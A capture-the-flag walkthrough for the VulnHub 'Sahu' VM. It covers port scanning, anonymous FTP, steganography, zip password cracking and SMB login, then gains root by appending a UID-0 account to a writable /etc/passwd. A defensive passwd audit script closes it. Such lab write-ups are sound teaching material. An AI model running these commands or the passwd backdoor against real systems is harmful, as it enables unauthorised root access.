Target machine description
Sahu is a VirtualBox VM built on Ubuntu 64-bit. The goal of this machine is to get root and read the root.txt file with some good enumeration skills.
Difficulty : Beginner
Goal : Boot To Root
## Changelog: v1.1 - 2020-03-04 v1.0 - 2020-02-01
Download: https://www.vulnhub.com/entry/sahu-11,421/
Checklist
- Information gathering
  - netdiscover
  - nmap
  - enum4linux
  - crunch
  - fcrackzip
- Privilege escalation
  - Writable /etc/passwd
Information gathering
Target IP
Port scan
nmap -A -p- 192.168.217.175
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 230 Jan 30 2020 ftp.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.217.168
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
| 256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_ 256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open netbios-ssn Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)
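Open ports: 21, 22, 80, 139, 445
Port 21 allows anonymous login
This yields a zip archive, but we do not have its password
Port 80 serves a single image
Ports 139 and 445
enum4linux
Use enum4linux to gather information about the host
This reveals the user sahu
A password is needed here as well
Directory scan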
dirb http://192.168.217.175/ /usr/share/wordlists/dirb/big.txt
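The directory scan turns up /H/A, which looks like the start of the word haryana shown on the web page
Complete the path and visit the page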
view-source:http://192.168.217.175/H/A/R/Y/A/N/A/
At the end of the page source is the text: extract with hurry
Download the image from the home page
Extract the hidden message
steghide extract -sf Haryana-1-1.jpg -p hurrry
I have found the password for a zip file but i have forgote the last part of it, can you find out
Now generate a wordlist based on the hint
Wordlist generation with crunch
crunch 2
Use the generated wordlist zippasswd01 to crack the zip
fcrackzip -D -u -p zippasswd01 ftp.zip
The password is 5AHU#5
Extract the archive
This yields the ftp user and password
sahu
sahu14216
Log in to SMB
smbclient //192.168.217.175/sambashare -U sahu
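This yields the SSH account and password
Privilege escalation
After logging in, we find that /etc/passwd is writable
Now write a new user into it
echo "yutian:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
# The password is Password@973
Switch to the new user to get root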
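A defender-side check for the condition used in the privilege-escalation step, as an added example that is not part of the original write-up: it flags a passwd file that group or others can write to, and entries that carry UID 0 or a hash directly in field 2. The function names are hypothetical and the sample file is constructed, with its last line taken from the walkthrough above.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for the conditions the
# privilege-escalation step depends on. Function names are hypothetical.

# Succeeds (exit 0) if group or others may write to the file.
passwd_mode_is_loose() {
    [ -n "$(find "$1" \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Prints one finding per line: MALFORMED, UID0, EMPTY_PASSWORD, INLINE_HASH.
audit_passwd_entries() {
    awk -F: '
        /^#/ || NF == 0 { next }
        NF != 7 { print "MALFORMED line " NR }
        # Any UID-0 account other than root has full root privileges.
        $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $1 != "root" { print "UID0 " $1 }
        # Field 2 should be "x" (hash kept in /etc/shadow) or a lock marker.
        $2 == "" { print "EMPTY_PASSWORD " $1; next }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "INLINE_HASH " $1 }
    ' "$1"
}

# Constructed sample: three ordinary entries plus the entry appended in the
# walkthrough above.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sahu:x:1000:1000:sahu:/home/sahu:/bin/bash
yutian:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
EOF
}

# Demo on the constructed sample; on a real host, pass /etc/passwd instead.
sample=$(mktemp)
write_sample_passwd "$sample"
chmod 666 "$sample"            # reproduce the weak mode (constructed)
passwd_mode_is_loose "$sample" && echo "LOOSE_MODE $sample"
audit_passwd_entries "$sample"
chmod 644 "$sample"            # corrected mode for a passwd file
passwd_mode_is_loose "$sample" || echo "mode ok after chmod 644"
rm -f "$sample"
```

On a healthy system /etc/passwd is owned by root with mode 0644 and both functions report nothing.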